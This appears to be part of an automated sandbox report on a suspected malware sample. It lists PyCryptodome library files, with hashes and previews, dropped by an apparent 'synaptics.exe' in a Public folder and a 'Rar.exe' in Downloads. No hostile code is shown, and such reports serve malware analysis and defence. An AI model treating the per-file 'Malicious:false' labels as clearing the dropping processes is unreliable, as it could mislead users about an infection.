                                                                                                                                                                                      Preview:o..........f.:.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc....................@...sh...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5817
                                                                                                                                                                                      Entropy (8bit):5.104392543295395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:cFv6kvV9AtXEHlhfKx7lhL3FeaqBP6sQLRdJ98HJm3qc5pHIeOD:cH9pHlhM7lekL96mxsD
                                                                                                                                                                                      MD5:6D5591F049D697294B55A501D41C01A1
                                                                                                                                                                                      SHA1:5CA2E2706EE0227E234C651D770B35ADA3A06318
                                                                                                                                                                                      SHA-256:78FD5F9D687F7859A88B674DBABC0E7ECEE057E3ADC5F359EF0AE8518088759C
                                                                                                                                                                                      SHA-512:95A24978F775A3B8282A8E3D52F99D4186F53C53301C3332F5645CC9A131EE5CEB1B4E71FD14BC12E33766EE6DE7016268A53D19E0F783FEE41FDFFE4A131F20
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fQ!.......................@...sX...d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Crypto.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c....................@...s,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17071
                                                                                                                                                                                      Entropy (8bit):5.335286444215697
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Pt+RW9/ScqbkrPM4JjaTlTbIl67Wa+7l9A:Pkw9/Zw4c7Fc9A
                                                                                                                                                                                      MD5:4FC27A4177BA77D149109E9368E9D36E
                                                                                                                                                                                      SHA1:A7042065F8FA050B13665FDA19B5447EC7686AC6
                                                                                                                                                                                      SHA-256:910B9ADB8B60D6C2A5BBD27D67DA46E2514C0BE4DFAD40066683979A4B62F8A1
                                                                                                                                                                                      SHA-512:AD190FC141575D2059D485B3ED8D312FAB21F7319D3DB03662C31F4D468C832D5D4740AE048816214A5D3B906522FC5BE507B1B26DF2FA0BC86C0CA79A9D6961
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.U.......................@...s....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.e...Z.d.d...Z.e...Z.G.d.d...d.e...Z d.d...Z!e!d.d.d...Z"G.d.d...d.e...Z#d.d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c........................sl...d.d.l.m.}...d.}.|.d.|...}.z.....f.d
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14653
                                                                                                                                                                                      Entropy (8bit):5.242538988513641
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:SqHGdezRbrM0R4K/eWAe4hvDCxH5DBbaZ0dQ:SsGdeZMMF2ygOZ5aZ0dQ
                                                                                                                                                                                      MD5:64BA6D52F739BAE2537D83C37B9C7C3D
                                                                                                                                                                                      SHA1:31DE522E71314D4D085C341B86E7DA6BF31CB21B
                                                                                                                                                                                      SHA-256:7EA3229D6D4B4D1860C6C004FD20195E3BFA876670408FA44D703F155FD91DC7
                                                                                                                                                                                      SHA-512:D9814DF69C267462BB5BFA4A1C8B13691CD010B1D46BEFF29A9B037BC69A425F268E2D234BC3DB06CD3AF70903A1462F3013ABD7589A49241C7B5FE7709D1E3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.O.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).ah....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Crypto.Cipher import AES. >>> from Crypto.Random import get_random_bytes. >>>. >>> key = get_ran
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7359
                                                                                                                                                                                      Entropy (8bit):5.087305523269934
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:qA6kv9jQvHHq12nxIN3hSLA5esIUGGt834mGPMsQN7t/z8HaGTvt834+5pcRJ6Xn:dyHqAxId8s9GkU4yZlGTVU4JCoq/1l
                                                                                                                                                                                      MD5:6FC6FFA8BC7E3BFE1D24B13AB76BD235
                                                                                                                                                                                      SHA1:7162D9046E6B98CBB9CCC243022D808BFF63A4C3
                                                                                                                                                                                      SHA-256:AAE4286AFD12F79B723CBF7F3C0A38FE4F0D5C04730160F93FB77E595B94283B
                                                                                                                                                                                      SHA-512:A2AA2AB7CC5C190DBEBE8BD764D9C750EEC70498AA011CCD571563ACDB2A0804D4A612A31179C05D2D2335071D6A07254FCF43BB65ECA4247B306B892EEE4CA6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.(.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,. const uint8
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4815
                                                                                                                                                                                      Entropy (8bit):5.238106852194177
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:RV8N+A+Xkyi2Kt834mGPUGt8340y9nxBX4o7UIDFI:RU+A+5YU44kU4H9xxUIZI
                                                                                                                                                                                      MD5:1E6D4322F828C3148DC645AC02283896
                                                                                                                                                                                      SHA1:C18EB349C6F29D0B32FC460BE47C45B311A5AAA0
                                                                                                                                                                                      SHA-256:98EE5257E14919D3641CEEB06C4A7AA51F0772605D75EB82A9FE98D044300E61
                                                                                                                                                                                      SHA-512:D92314DDB4C22D4540FE21B7AA87C0E5DEC926DD99CD38B05A4C0E9EA130EDCCF462CDDEE8333E5F4546B92BF34A7A0C9D4D20727E914F7F7F343C3661A70100
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f[........................@...s>...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c....................C...s....|.j.|._.d.|._.|.j.|.|.j.f.d.|.j...|.j.d...d...|.....}.t.d.d.|...}.t.|...|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11816
                                                                                                                                                                                      Entropy (8bit):5.250366910481593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:pLqjzBGjN4xYIBKXrEApsGdDGdkT+WIp6hW97iuA4al45B3xQrBBQ:tq45XIBarEWfYiIpAe7JaG81m
                                                                                                                                                                                      MD5:EC6CFE1ACDC8B91ADCD9C033ECAEAE8B
                                                                                                                                                                                      SHA1:6AEE1E3D747BBA37D9C3A0D8649C5048AE9EDD88
                                                                                                                                                                                      SHA-256:357DABFACCD7A90A7062408B64A2F25ACE15030255CC9C3E8DCDAE7CAF396E30
                                                                                                                                                                                      SHA-512:2E43420ADBCB2493C6D7EC790A5523CB3D9B44BFD03F203FA40913322EE745E6DD83341ADB95DCE9CA8DEC3B63ECBF3B8E8BD1504CB0480954AEE6867380BF17
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f!8.......................@...s....d.Z.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z-.Synthetic Initialization Vector (SIV) mode....SivMode.....)...hexlify..unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)..._S2V)...BLAKE2s)...get_random_bytesc....................@...sl...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....Synthetic Initialization Vector (SIV)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed, and it will. still be subject to authentication. The decryption step tells the receiver. if the message comes from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message - including
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1528
                                                                                                                                                                                      Entropy (8bit):4.645410861092278
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:mKD8osetp6ePCXjDRy2NjKKJwABGhxmZk5F5186hnnj5Mwj:mKwosM6p1uV860wj
                                                                                                                                                                                      MD5:775ECC4F4EE06A17DD571D8E0D85B23E
                                                                                                                                                                                      SHA1:C69DAA752AD762B85D6520C4E7278607BB02AD9C
                                                                                                                                                                                      SHA-256:FFCB843B67D41D0D6DE61A84FF21EA430B1994305609EC7819AB5AFF50EB512D
                                                                                                                                                                                      SHA-512:F426374C2838C2D7655BDC76174C36A7709A4CC05B39E22A540BA07B853CD14161C5926C36A8EB40B40D9568F838E17393EF6AA5E0D06C7773AE5355000487ED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fI........................@...s2...d.d.l.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..c_uint8_ptrz.Crypto.Cipher._pkcs1_decodea..... int pkcs1_decode(const uint8_t *em, size_t len_em,. const uint8_t *sentinel, size_t len_sentinel,. size_t expected_pt_len,. uint8_t *output);.. int oaep_decode(const uint8_t *em,. size_t em_len,. const uint8_t *lHash,. size_t hLen,. const uint8_t *db,. size_t db_len);. c....................C...sP...t.|...t.|...k.r.t.d.....t...t.|...t.t.|.....t.|...t.t.|.....t.|...t.|.....}.|.S.).Nz.Incorrect output length)...len..ValueErr
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4890
                                                                                                                                                                                      Entropy (8bit):4.812843153997009
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWHgkIl+zui+I4w+7nC/Y/slLH3I:4qrskrs9t3q/IwuiFGC/OOLY
                                                                                                                                                                                      MD5:6D8138E2212AEA8C9815ABA5BEBD43D9
                                                                                                                                                                                      SHA1:62A40C2E67FC652354E9A8B3126E77F9D759A174
                                                                                                                                                                                      SHA-256:D4B807F0F64FE07BE95C7A7F40B4D35024C3A05770C942F9B25A8782B9DE90FB
                                                                                                                                                                                      SHA-512:66DE5F2B988B9DD0A7D497B6BBBD2920859BC79A529A6200470B6EDB52D36BFEF55A2B51A0146BCC5B08FBDDD9529F9AFCEE1E2E8B86F1731BF6BAF90051484B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):450
                                                                                                                                                                                      Entropy (8bit):4.960253129735369
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYB3vIY3wHVXFL1ApJR4QwEh72CX5BgR48OR42:1REcT36XFRA1Nh71m7U1
                                                                                                                                                                                      MD5:1D2E126B0EA263236F02A5B62DA5903D
                                                                                                                                                                                      SHA1:BCA2F2DC2A69380180FFEACDB276A6CA7FFD2036
                                                                                                                                                                                      SHA-256:FCF71DFFB424435A46138D3B0377F30E1DB2AA318600D6DAE7B123DF848D3EA2
                                                                                                                                                                                      SHA-512:4B806AABF25A8D9A705E282EB11EE73500BC1CF71A6EBE59A35A732DE1F5CA0D960BAC124059EF85AF9A6E5A2023895D7CDB195A884A8161275D9BE237F0A518
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE128_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE128_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE128_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE128_XOF: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4892
                                                                                                                                                                                      Entropy (8bit):4.816809610030539
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWHgkIlHzPiPI7+7nC/Y/sl3nbI:4qrskrs9t3q/IZPiyGC/+O3M
                                                                                                                                                                                      MD5:0B15BEEE639A9999E98C64F769F9133D
                                                                                                                                                                                      SHA1:3D1366E4788CB51E655EC8C76AA3B7DB6FB98DF9
                                                                                                                                                                                      SHA-256:3BE322B0801ABA422C870967EC82AF10958F370C944B3E6370EE8C2F7A1E7046
                                                                                                                                                                                      SHA-512:B66693BFB0AAAD73F1BCEAE3DA2410EA53B3366734FDAC0985D7B0C0ACDC849BA98C2D9DA1A0C418FD1C9D757D9430C099F847E7E67B48443A3E55228ACFA0E1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):450
                                                                                                                                                                                      Entropy (8bit):4.960253129735369
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYB3vIY3gHVXFL1ApJR4QwIh72CX5BgR4gOR4K:1REcT3g1XFRA1Rh71m/UZ
                                                                                                                                                                                      MD5:7A030ACE3463C718EAA115B061D5E0CE
                                                                                                                                                                                      SHA1:0525426CE1A9ABE207F53E953EA8E272E423D512
                                                                                                                                                                                      SHA-256:5FF0C2256DD9F35EB7BF58D07EDC5A27E73173221079006B1AF95D0B114863A4
                                                                                                                                                                                      SHA-512:230109D6EAC483A3DFA0E268477D860AF0DB445D89EF5E39B32A9833CC85E8FBD610C88993CABB097A60630620539191A6AC9742DAD3A7FA141600C7AC4603D5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE256_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE256_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE256_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE256_XOF: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4888
                                                                                                                                                                                      Entropy (8bit):5.0581555982839435
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:MMDqrYJALrYJHdt3EHGuIWHEnGLBx9RhHAygOAHbaIfoCIUCP9lVtpCj:Nqrskrs9t3q/ImHhzvfPoj
                                                                                                                                                                                      MD5:386FB9A133C912AF07687FA9D1EE193A
                                                                                                                                                                                      SHA1:FCA1900C47A573551C1EE74694CB0D374C7B20C7
                                                                                                                                                                                      SHA-256:36051EA4794AA6687E689974F315CE9CE9620EC1F9B1AB4C2F0F9C8099D87BBF
                                                                                                                                                                                      SHA-512:1A92C554CABE3DBF6A013E685D6FB919B47A39BF2429795CA87CEC1C15405F386644F141B79923B6B79833E15ABBA02A211FA939CBB0749888ACBD304AB2AE45
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):688
                                                                                                                                                                                      Entropy (8bit):4.533807558794474
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYBzRo8seUvIY39cHRyD1AQ0dWRFwiOtC5J3r3/V039WgtcP33/RM33dWgtW:1REEyNT39oIAvdWtrj/VGif/qns
                                                                                                                                                                                      MD5:19A89FFFB5E19D2A439870AA97B56DF2
                                                                                                                                                                                      SHA1:32377BCB0660A03F28324C68EF03E94D0239A1DD
                                                                                                                                                                                      SHA-256:B5671E5E8FC4513C2E0C9F072C1A9C868656F0CD66783DC011FC4556C1BD2306
                                                                                                                                                                                      SHA-512:466932A02E76056468E12E1984DD3EA0DE44A3544DEA95F19723BE2EBBD9887D177AB7B3F75BAAA74E74D154C396DA468AA8F5492917599154EAEF04F3546B19
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Any, Union, List, Tuple..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class TupleHash(object):.. digest_size: int.. def __init__(self,.... custom: bytes,.. cshake: ModuleType,.. digest_size: int) -> None: ..... def update(self, *data: Buffer) -> TupleHash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,... digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .......def new(digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2902
                                                                                                                                                                                      Entropy (8bit):5.194127497375906
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH2H9useGoCWxVGpYPGQ2IlstzSiwtpCj:MMDqrYJALrYJHdt3EHGuIWHdroCIUCPG
                                                                                                                                                                                      MD5:CA7F63F5DC1A1059E168A5580E88B78B
                                                                                                                                                                                      SHA1:4064F740C7E09083F8CF354BB24A56778D83D6A4
                                                                                                                                                                                      SHA-256:96BB2970B54CC270DE193FB71155AFFBF54F9ACF21310AC4AD968893A478B3DF
                                                                                                                                                                                      SHA-512:C259EF33FB4747529BF9496E3E78B9548279FDAE9BFE2E318FF8A7BFE13815500CBF4A31887A89D9DE21FFBB83897DCAC5F43AAA62C675A1A7473600B439BCCF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):149
                                                                                                                                                                                      Entropy (8bit):4.609062935971047
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1Lx7/NULQk8xNovSyrzcAiwZJysFTMCAW6wWfFKRiZJyFrIftZMFySJINfFDy:1Lx7/NULQXNoFrzcAx3ysRMhwWfsRi3s
                                                                                                                                                                                      MD5:0C079EDD19DA6729069C7098599200CD
                                                                                                                                                                                      SHA1:31985EE067F54DFCA6F334621CA9018D2A61DA15
                                                                                                                                                                                      SHA-256:0B014A808207E4C2A6375DFD6ADE40C97B5802C8F9EA76748F333C1386C6704C
                                                                                                                                                                                      SHA-512:5DFC7A622B54993F74F2848B595FDFCB33B63E43EDE31D384D4A635B179030EFC1222545607C8B816B90AC6FB273B8937B135F42B95AEB08AB906CF899027EB4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from .TupleHash128 import TupleHash....def new(digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3947
                                                                                                                                                                                      Entropy (8bit):4.323340706359232
                                                                                                                                                                                      Encrypted:false
